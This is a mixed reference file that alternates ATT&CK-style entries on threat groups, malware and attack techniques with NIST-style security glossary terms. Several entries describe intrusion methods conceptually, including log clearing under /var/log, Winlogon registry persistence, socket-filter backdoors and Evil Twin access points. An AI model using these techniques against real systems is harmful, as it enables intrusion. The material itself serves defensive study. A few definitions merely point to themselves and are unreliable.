Name: Moses Staff
Type: intrusion-set
Description: Moses Staff is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. Moses Staff openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand. 

Security researchers assess Moses Staff is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.

Term: approved
Definition: FIPS approved or NIST recommended: an algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation.

Term: DN
Definition: An identifier that uniquely represents an object in the X.500 directory information tree.

Name: Chat Messages
Type: attack-pattern
Description: Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.

Rather than accessing the stored chat logs (i.e., Credentials In Files), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation .

Term: system element
Definition: Member of a set of elements that constitute a system. 
Note 1: A system element can be a discrete component, product, service, subsystem, system, infrastructure, or enterprise. 
Note 2: Each element of the system is implemented to fulfill specified requirements. 
Note 3: The recursive nature of the term allows the term system to apply equally when referring to a discrete component or to a large, complex, geographically distributed system-of-systems. 
Note 4: System elements are implemented by: hardware, software, and firmware that perform operations on data/information; physical structures, devices, and components in the environment of operation; and the people, processes, and procedures for operating, sustaining, and supporting the system elements.

Name: schtasks
Type: tool
Description: schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time.

Name: WIRTE
Type: intrusion-set
Description: WIRTE is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. WIRTE has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. WIRTE has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets.

Name: SharpDisco
Type: malware
Description: SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.

Name: Disk Content Wipe
Type: attack-pattern
Description: Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface. Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data. Adversaries have also been observed leveraging third-party drivers like RawDisk to directly access disk content. This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.

Term: application
Definition: The system, functional area, or problem to which information technology is applied. The application includes related manual procedures as well as automated procedures. Payroll, accounting, and management information systems are examples of applications.

Term: Network Address Translation (NAT)
Definition: The process of mapping addresses on one network to addresses on another network.

Term: resource
Definition: Passive system-related entity, including devices, files, records, tables, processes, programs, and domains that contain or receive information. Access to an object (by a subject) implies access to the information it contains. See subject.

Name: Sykipot
Type: malware
Description: Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims. The group using this malware has also been referred to as Sykipot.

Term: Isolation
Definition: The ability to keep multiple instances of software separated so that each instance only sees and can affect itself.

Name: TONESHELL
Type: malware
Description: TONESHELL is a custom backdoor that has been used since at least Q1 2021. TONESHELL malware has previously been leveraged by Chinese affiliated actors identified as Mustang Panda.

Term: certificate management
Definition: Process whereby certificates (as defined above) are generated, stored, protected, transferred, loaded, used, and destroyed. (In the context of this practice guide, it also includes inventory, monitoring, enrolling, installing, and revoking.)

Term: insider
Definition: An entity inside the security perimeter that is authorized to access system resources but uses them in a way not approved by those who granted the authorization.

Term: assessor
Definition: See Security Control Assessor or Privacy Control Assessor.

Term: cybersecurity outcome
Definition: Statement of what is expected either from a product or from an organization in support of a product related to the cybersecurity of that product. Can be technical, in the form of product cybersecurity capabilities or non-technical, in the form of non-technical supporting capabilities.

Term: Key derivation
Definition: The process by which keying material is derived from either a pre-shared key or a shared secret produced during a key-agreement scheme along with other information.

Name: Metamorfo
Type: malware
Description: Metamorfo is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.

Term: igamc
Definition: See the definition for igamc.

Term: availability
Definition: The security objective that generates the requirement for protection against intentional or accidental attempts to (1) perform unauthorized deletion of data or (2) otherwise cause a denial of service or data.

Term: web-based training
Definition: An internet-based session that allows learners to study independently and at their own pace with video, audio, and/or interactive techniques (e.g., drag-and-drop or fill in the blank). Built-in testing and accountability features can gauge performance.

Term: key establishment
Definition: A function in the lifecycle of a cryptographic key; the process by which cryptographic keys are securely established among entities using manual transport methods (e.g., key loaders), automated methods (e.g., key-transport and/or key-agreement protocols), or a combination of automated and manual methods.

Term: Filesystem
Definition: A software mechanism that defines the way that files are named, stored, organized, and accessed on logical volumes of partitioned memory.

Term: QEMU (Quick Emulator)
Definition: A software module that is a component of the hypervisor platform that supports full virtualization by providing emulation of various hardware devices.

Term: Secure Sockets Layer (SSL)
Definition: A protocol used for protecting private information during transmission via the Internet. Note: SSL works by using the service public key to encrypt a secret key that is used to encrypt the data that is transferred over the SSL session. Most web browsers support SSL and many web sites use the protocol to obtain confidential user information, such as credit card numbers. By convention, URLs that require an SSL connection start with "https:" instead of "http:". The default port for SSL is 443.

Term: Message Inject
Definition: A pre-scripted message that will be given to participants during the course of an exercise.

Term: insider threat
Definition: An entity with authorized access (i.e., within the security domain) that has the potential to harm an information system or enterprise through destruction, disclosure, modification of data, and/or denial of service.

Term: Recipient-usage period
Definition: The period of time during the cryptoperiod of a symmetric key during which the protected information is processed.

Term: <em>TMacTagBits(X)</em>
Definition: A truncation function that outputs the most significant (i.e., leftmost) MacTagBits bits of the input string, X, when the bit length of X is greater than MacTagBits; otherwise, the function outputs X. For example, T2(1011) = 10, T3(1011) = 101, and T4(1011) = 1011.

Term: supplier
Definition: Organization or individual that enters into an agreement with the acquirer or integrator for the supply of a product or service. This includes all suppliers in the supply chain, developers or manufacturers of systems, system components, or system services; systems integrators; vendors; product resellers; and third party partners.

Term: Product Category
Definition: The main product category of the IT product (e.g., firewall, IDS, operating system, web server).

Term: synthetic identity fraud
Definition: The use of a combination of personal information to fabricate a person or entity to commit a dishonest act for personal or financial gain.

Term: crypto agility for a computing system
Definition: The ability to adopt new cryptographic algorithms and stop the use of vulnerable algorithms in applications without disrupting the running system.

Term: Authorized
Definition: Entitled to a specific mode of access.

Term: ID
Definition: A bit string that is associated with a person, device or organization. It may be an identifying name or a nickname, or may be something more abstract (for example, a string consisting of an IP address).

Term: Key-pair owner
Definition: In asymmetric-key cryptography, the entity that is authorized to use the private key associated with a public key, whether that entity generated the key pair itself, or a trusted party generated the key pair for the entity.

Name: ECCENTRICBANDWAGON
Type: malware
Description: ECCENTRICBANDWAGON is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.

Term: Post Office Protocol (POP)
Definition: A standard protocol used to receive electronic mail from a server.

Term: identity
Definition: The distinguishing character or personality of an entity.

Term: Octet String
Definition: An ordered sequence of octets.

Term: semiblock string
Definition: For a given block size, a string that can be represented as the concatenation of semiblocks.

Term: high-impact system
Definition: A system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS Publication 199 potential impact value of high.

Term: NLP
Definition: Statements governing management and access of enterprise objects. NLPs are human expressions that can be translated to machine-enforceable access control policies.

Term: risk elevation
Definition: The process of transferring the decisions on risk response to a more senior stakeholder when the factors involved (e.g., a regulatory compliance risk) are particularly sensitive or critical. For example, enterprise risk strategy might direct that any risk with more than $1 million exposure or risks related to a particularly important business application must be managed at a more senior level.

Term: Piconet
Definition: A small Bluetooth network created on an ad hoc basis that includes two or more devices.

Term: availability
Definition: 1. Ensuring timely and reliable access to and use of information.

Term: Internet Protocol
Definition: Standard protocol for transmission of data from source to destinations in packet-switched communications networks and interconnected systems of such networks.

Term: Greatest common divisor
Definition: The largest positive integer that divides each of two positive integers without a remainder.

Term: Key Rotation
Definition: Changing the key, i.e., replacing it by a new key. The places that use the key or keys derived from it (e.g., authorized keys derived from an identity key, legitimate copies of the identity key, or certificates granted for a key) typically need to be correspondingly updated. With SSH user keys, it means replacing an identity key by a newly generated key and updating authorized keys correspondingly.

Term: Approved hash algorithms
Definition: Hash algorithms specified in FIPS 180-4.

Term: <em>timestamp</em>
Definition: Contains the time and, possibly, other information; a component of timestamped_data.

Term: Cryptographic key component
Definition: See Cryptographic key component.

Term: Bitstring
Definition: See Bitstring.

Name: Build Image on Host
Type: attack-pattern
Description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.

An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize Deploy Container using that custom image. If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.

Term: cryptographic key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. For the purposes of these guidelines, key requirements shall meet the minimum requirements stated in Table 2 of NIST SP 800-57 Part 1. 
See also Asymmetric Keys, Symmetric Key.

Term: OS
Definition: A collection of software that manages computer hardware resources and provides common services for computer programs.

Name: System Services
Type: attack-pattern
Description: Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution.

Term: system security officer
Definition: See system security officer (SSO).

Term: Account
Definition: An entity in a blockchain that is identified with an address and can send transactions to the blockchain.

Term: Software Bill of Materials
Definition: A formal record containing the details and supply chain relationships of various components used in building software. Software developers and vendors often create products by assembling existing open-source and commercial software components. The SBOM enumerates these components in a product.

Term: keying material
Definition: A binary string, such that any non-overlapping segments of the string with the required lengths can be used as symmetric cryptographic keys and secret parameters, such as initialization vectors.

Term: <strong>Shall</strong>
Definition: A requirement that needs to be fulfilled to claim conformance to this Recommendation. Note that <strong>shall</strong> may be coupled with <strong>not</strong> to become <strong>shall not</strong>.

Term: RED signal
Definition: Any electronic emission (e.g., plain text, key, key stream, subkey stream, initial fill, or control signal) that would divulge national security information if recovered.

Term: query access
Definition: A capability with which an attacker can issue queries to a trained machine learning model and obtain predictions or generations.

Name: Remote Data Staging
Type: attack-pattern
Description: Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

Name: CoinTicker
Type: malware
Description: CoinTicker is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.

Term: Data Processing
Definition: The collective set of data actions (i.e., the complete data life cycle, including, but not limited to collection, retention, logging, generation, transformation, use, disclosure, sharing, transmission, and disposal).

Term: RSA
Definition: For the purposes of this specification, RSA is a public-key signature algorithm specified by PKCS #1. As a reversible public-key algorithm, it may also be used for encryption.

Term: assessment method
Definition: A focused activity or action employed by an Assessor for evaluating a particular issuer control.

Term: non-discretionary access control
Definition: See mandatory access control (MAC).

Term: block size
Definition: For a given block cipher and key, the fixed length of the input (or output) bit strings.

Term: privacy program plan
Definition: A formal document that provides an overview of an agency's privacy program, including a description of the structure of the privacy program, the resources dedicated to the privacy program, the role of the Senior Agency Official for Privacy and other privacy officials and staff, the strategic goals and objectives of the privacy program, and the program management controls and common controls in place or planned for meeting applicable privacy requirements and managing privacy risks.

Term: role-based access control (RBAC)
Definition: Access control based on user roles (i.e., a collection of access authorizations that a user receives based on an explicit or implicit assumption of a given role). Role permissions may be inherited through a role hierarchy and typically reflect the permissions needed to perform defined functions within an organization. A given role may apply to a single individual or to several individuals.

Term: trustworthiness (system)
Definition: The degree to which an information system (including the information technology components that are used to build the system) can be expected to preserve the confidentiality, integrity, and availability of the information being processed, stored, or transmitted by the system across the full range of threats. A trustworthy information system is believed to operate within defined levels of risk despite the environmental disruptions, human errors, structural failures, and purposeful attacks that are expected to occur in its environment of operation.

Name: Night Dragon
Type: campaign
Description: Night Dragon was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.

Name: ROMMONkit
Type: attack-pattern
Description: Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. 

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

Term: <em>⎾x⏋</em>
Definition: The smallest integer that is larger than or equal to <i>X</i>. The ceiling of <i>X</i>. For example,&nbsp;<span class="math-tex">\(\lceil\)</span>8.2<span class="math-tex">\(\rceil\)</span>&nbsp;= 9.

Term: Checklist Revision
Definition: Represents a change to the checklist content that does not affect the underlying rule/value configuration guidance put forth by the content. A scenario that would require a new checklist revision is when SCAP content is created for a prose checklist. This revision would change the checklist's content type from Prose to SCAP Content. A new checklist revision would be created to accommodate this change, while still maintaining the Prose checklist revision for interested parties.

Term: Ad Hoc Network
Definition: A wireless network that allows easy connection establishment between wireless client devices in the same physical area without the use of an infrastructure device, such as an access point or a base station.

Name: RedLine Stealer
Type: malware
Description: RedLine Stealer is an information-stealer malware variant first identified in 2020. RedLine Stealer is a Malware as a Service (MaaS) and was reportedly sold as either a one-time purchase or a monthly subscription service. Information obtained from RedLine Stealer has been known to be sold on the deep and dark web to Initial Access Brokers (IABs), who use or resell the stolen credentials for further intrusions.

Term: <em>GCTRK (ICB, X)</em>
Definition: The output of the GCTR function for a given block cipher with key K applied to the bit string X with an initial counter block ICB.

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements.
See System Security Plan or Information Security Program Plan.

Term: threat scenario
Definition: A set of discrete threat events, associated with a specific threat source or multiple threat sources, partially ordered in time. Synonym for Threat Campaign.

Term: denial of service (DoS)
Definition: The prevention of authorized access to resources or the delaying of time- critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided.)

Term: security functions
Definition: The hardware, software, and/or firmware of the information system responsible for enforcing the system security policy and supporting the isolation of code and data on which the protection is based.

Term: Manufacturing Operations
Definition: Activities concerning the facility operation, system processes, materials input/output, maintenance, supply and distribution, health, and safety, emergency response, human resources, security, information technology and other contributing measures to the manufacturing enterprise.

Term: reciprocity
Definition: Mutual agreement among participating organizations to accept each other’s security assessments in order to reuse information system resources and/or to accept each other’s assessed security posture in order to share information.

Term: Byte
Definition: A sequence of eight bits.

Term: dataset with identifiers
Definition: A dataset that contains information that directly identifies individuals.

Term: <em>d</em>
Definition: The normalized difference between the observed and expected number of frequency components. See Sections 2.6 and 3.6.

Term: federal agency
Definition: An executive department specified in 5 U.S.C., Sec. 101; a military department specified in 5 U.S.C., Sec.102; an independent establishment as defined in 5 U.S.C., Sec. 104(1); or a wholly owned government corporation fully subject to the provisions of 31 U.S.C., Chapter 91.

Name: FrameworkPOS
Type: malware
Description: FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from sytems that run physical POS devices.

Term: Bitwise Exclusive-Or
Definition: An operation on two bitstrings of equal length that combines corresponding bits of each bitstring using an exclusive-or operation.

Term: Closed Source Operating System
Definition: Source code for an operating system is not publically available.

Term: Communications Router
Definition: A communications device that transfers messages between two networks. Common uses for routers include connecting a LAN to a WAN, and connecting MTUs and RTUs to a long-distance network medium for SCADA communication.

Term: Verifier Impersonation
Definition: An attack in which the subscriber is lured (usually through an email) to interact with a counterfeit verifier/RP and tricked into revealing information that can be used to masquerade as that subscriber to the real verifier/RP.

Name: nbtstat
Type: tool
Description: nbtstat is a utility used to troubleshoot NetBIOS name resolution.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the correct key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples of cryptographic operations requiring the use of cryptographic keys include: 1. The transformation of plaintext data into ciphertext data, 2. The transformation of ciphertext data into plaintext data, 3. The computation of a digital signature from data, 4. The verification of a digital signature, 5. The computation of an authentication code from data, 6. The verification of an authentication code from data and a received authentication code, 7. The computation of a shared secret that is used to derive keying material. 8. The derivation of additional keying material from a keyderivation key (i.e., a pre-shared key).

Term: key
Definition: See cryptographic key.

Name: Denis
Type: malware
Description: Denis is a Windows backdoor and Trojan used by APT32. Denis shares several similarities to the SOUNDBITE backdoor and has been used in conjunction with the Goopy backdoor.

Term: SSID
Definition: A name assigned to a wireless access point that allows stations to distinguish one wireless access point from another.

Term: verifier
Definition: The party trying to assess the authenticity of an identity

Term: selection operation
Definition: A control parameter that allows an organization to select a value from a list of predefined values provided as part of the control or control enhancement (e.g., selecting to either restrict an action or prohibit an action).

Term: Domain Controller
Definition: A server responsible for managing domain information, such as login identification and passwords.

Name: Taidoor
Type: malware
Description: Taidoor is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks. Taidoor has primarily been used against Taiwanese government organizations since at least 2010.

Term: handshake
Definition: Protocol dialogue between two systems for identifying and authenticating themselves to each other, or for synchronizing their operations with each other.

Term: cleartext
Definition: Intelligible data, the semantic content of which is available without using cryptographic techniques.

Term: cybersecurity framework function
Definition: One of the main components of the Framework. Functions provide the highest level of structure for organizing basic cybersecurity activities into Categories and Subcategories. The five functions are Identify, Protect, Detect, Respond, and Recover.

Term: KDK
Definition: As used in this Recommendation, either a one-step key-derivation method or a key-derivation function based on a pseudorandom function as specified in SP 800-108.

Name: Leafminer
Type: intrusion-set
Description: Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017.

Name: Kinsing
Type: malware
Description: Kinsing is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment.

Term: strength of function
Definition: Criterion expressing the minimum efforts assumed necessary to defeat the specified security behavior of an implemented security function by directly attacking its underlying security mechanisms.

Term: CAA
Definition: A record associated with a Domain Name Server (DNS) entry that specifies the CAs that are authorized to issue certificates for that domain.

Term: boundary protection
Definition: Monitoring and control of communications at the external interface to a system to prevent and detect malicious and other unauthorized communications using boundary protection devices.

Term: mechanism
Definition: A device or method for achieving a security-relevant purpose.

Name: Line Runner
Type: malware
Description: Line Runner is a persistent backdoor and web shell allowing threat actors to upload and execute arbitrary Lua scripts. Line Runner is associated with the ArcaneDoor campaign.

Term: secret key
Definition: A cryptographic key that is used with a secret key (also known as a symmetric key) cryptographic algorithm that is uniquely associated with one or more entities and shall not be made public. The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure.

Term: evaluating authority
Definition: The official responsible for evaluating a reported COMSEC incident for the possibility of compromise.

Name: Clear Linux or Mac System Logs
Type: attack-pattern
Description: Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `/var/log/` directory. Subfolders in this directory categorize logs by their related functions, such as:

* `/var/log/messages:`: General and system-related messages
* `/var/log/secure or /var/log/auth.log`: Authentication logs
* `/var/log/utmp or /var/log/wtmp`: Login records
* `/var/log/kern.log`: Kernel logs
* `/var/log/cron.log`: Crond logs
* `/var/log/maillog`: Mail server logs
* `/var/log/httpd/`: Web server access and error logs

Term: plaintext
Definition: The input to the authenticated-encryption function.

Term: VRF
Definition: Internal phase within the NVD where a second, usually more experienced, NVD Analyst verifies the work completed during the Initial Analysis.

Term: purge
Definition: A method of sanitization that applies physical or logical techniques to render target data recovery infeasible using state-of-the-art laboratory techniques.

Term: product
Definition: A complete set of computer programs, procedures and associated documentation and data designed for delivery to a software consumer.

Term: safeguards
Definition: The management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.

Name: Winlogon Helper DLL
Type: attack-pattern
Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. 

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: 

* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

Term: Template Generator
Definition: In the PIV context a template generator is a software library providing facilities for the conversion of images conformant to FINGSTD to templates conformant to MINUSTD for storage on the PIV card.

Term: critical program (or technology)
Definition: A program which significantly increases capability, mission effectiveness, or extends the expected effective life of an essential system/capability.

Term: configuration management
Definition: A collection of activities focused on establishing and maintaining the integrity of information technology products and systems through the control of processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Name: System Script Proxy Execution
Type: attack-pattern
Description: Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.

Term: hash output
Definition: The result of applying a hash function to a message. Also known as a “hash value” or “hash output”.

Term: adaptability
Definition: The property of an architecture, design, and implementation which can accommodate changes to the threat model, mission or business functions, systems, and technologies without major programmatic impacts.

Term: token
Definition: Something that the claimant possesses and controls (such as a key or password) that is used to authenticate a claim. See cryptographic token.

Term: O1,…,O64
Definition: Bits of the Output Block

Term: Non-MUD-Capable
Definition: An IoT device that is not capable of emitting a MUD URL in compliance with the MUD specification.

Term: <em>⎾x⏋</em>
Definition: The ceiling of x; the smallest integer&nbsp;<span class="math-tex">\(\geq\)</span>&nbsp;x. For example,&nbsp;<span class="math-tex">\(\lceil\)</span>5<span class="math-tex">\(\rceil\)</span>&nbsp;= 5 and&nbsp;<span class="math-tex">\(\lceil\)</span>5.3<span class="math-tex">\(\rceil\)</span>&nbsp;= 6.

Term: message digest
Definition: A crytpographic checksum, typically generated for a file that can be used to detect changes to the file.. Synonyous with hash value/result.

Term: Initialization Vector (IV)
Definition: Initialization Vector

Name: Device Driver Discovery
Type: attack-pattern
Description: Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. Security Software Discovery) or other defenses (e.g., Virtualization/Sandbox Evasion), as well as potential exploitable vulnerabilities (e.g., Exploitation for Privilege Escalation).

Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows. Information about device drivers (as well as associated services, i.e., System Service Discovery) may also be available in the Registry.

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.

Name: COATHANGER
Type: malware
Description: COATHANGER is a remote access tool (RAT) targeting FortiGate networking appliances. First used in 2023 in targeted intrusions against military and government entities in the Netherlands along with other victims, COATHANGER was disclosed in early 2024, with a high confidence assessment linking this malware to a state-sponsored entity in the People's Republic of China. COATHANGER is delivered after gaining access to a FortiGate device, with in-the-wild observations linked to exploitation of CVE-2022-42475. The name COATHANGER is based on a unique string in the malware used to encrypt configuration files on disk: <code>“She took his coat and hung it up”</code>.

Name: Socket Filters
Type: attack-pattern
Description: Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.

To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling.

Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.

Name: Evil Twin
Type: attack-pattern
Description: Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or Input Capture.

By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks. Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks. A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic. 

Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network. Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.

Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points.

Name: Remcos
Type: tool
Description: Remcos is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. Remcos has been observed being used in malware campaigns.

Name: CARROTBAT
Type: malware
Description: CARROTBAT is a customized dropper that has been in use since at least 2017. CARROTBAT has been used to install SYSCON and has infrastructure overlap with KONNI.

Term: <em>nLen</em>
Definition: Length in bytes of the RSA modulus n.

Name: Storm-0501
Type: intrusion-set
Description: Storm-0501 is a financially motivated cyber criminal group that uses commodity and open-source tools to conduct ransomware operations. Storm-0501 has been active since 2021 and has previously been affiliated with Sabbath Ransomware and other Ransomware-as-a-Service (RaaS) variants such as Hive, BlackCat, Hunters International, LockBit 3.0, and Embargo ransomware.

Term: GSM
Definition: a set of standards for second generation cellular networks currently maintained by the 3rd Generation Partnership Project (3GPP).

Term: task
Definition: Activities required to achieve a goal. Note that activities can be physical or cognitive.

Term: Reproducibility
Definition: The ability of different experts to produce the same results from the same data.

Term: Implementation Testing for Validation
Definition: Testing by an independent and accredited party to ensure that an implementation of this Recommendation conforms to the specifications of this Recommendation.

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary lenth to a fixed-length bit string.

Term: cryptographic key
Definition: A value used to control cryptographic operations, such as decryption, encryption, signature generation, or signature verification. For the purposes of these guidelines, key requirements shall meet the minimum requirements stated in Table 2 of NIST SP 800-57 Part 1.
See also Asymmetric Keys, Symmetric Key.

Term: Digital Video Disc
Definition: Has the same shape and size as a CD, but with a higher density that gives the option for data to be double-sided and/or double-layered.

Term: module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms), holds plaintext keys and uses them for performing cryptographic operations, and is contained within a cryptographic module boundary. This Profile requires the use of a validated cryptographic module as specified in [FIPS 140].

Term: cipher suite
Definition: A common set of cryptographic algorithms used for key establishment, signature generation, hash function computation, encryption, and/or data authentication.

Term: service level agreement (SLA)
Definition: Represents a commitment between a service provider and one or more customers and addresses specific aspects of the service, such as responsibilities, details on the type of service, expected performance level (e.g., reliability, acceptable quality, and response times), and requirements for reporting, resolution, and termination.

Term: Digital Fingerprint
Definition: See message digest.

Term: BGP Path Validation
Definition: BGP Path Validation specifies a mechanism described in RFC 8205 that allows verifying a path an UPDATE traversed by verifying the validity of the signatures over the relevant data.

Name: Data from Local System
Type: attack-pattern
Description: Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information. Adversaries may also use Automated Collection on the local system.

Term: facility
Definition: Physical means or equipment for facilitating the performance of an action (e.g., buildings, instruments, tools).

Name: Office Application Startup
Type: attack-pattern
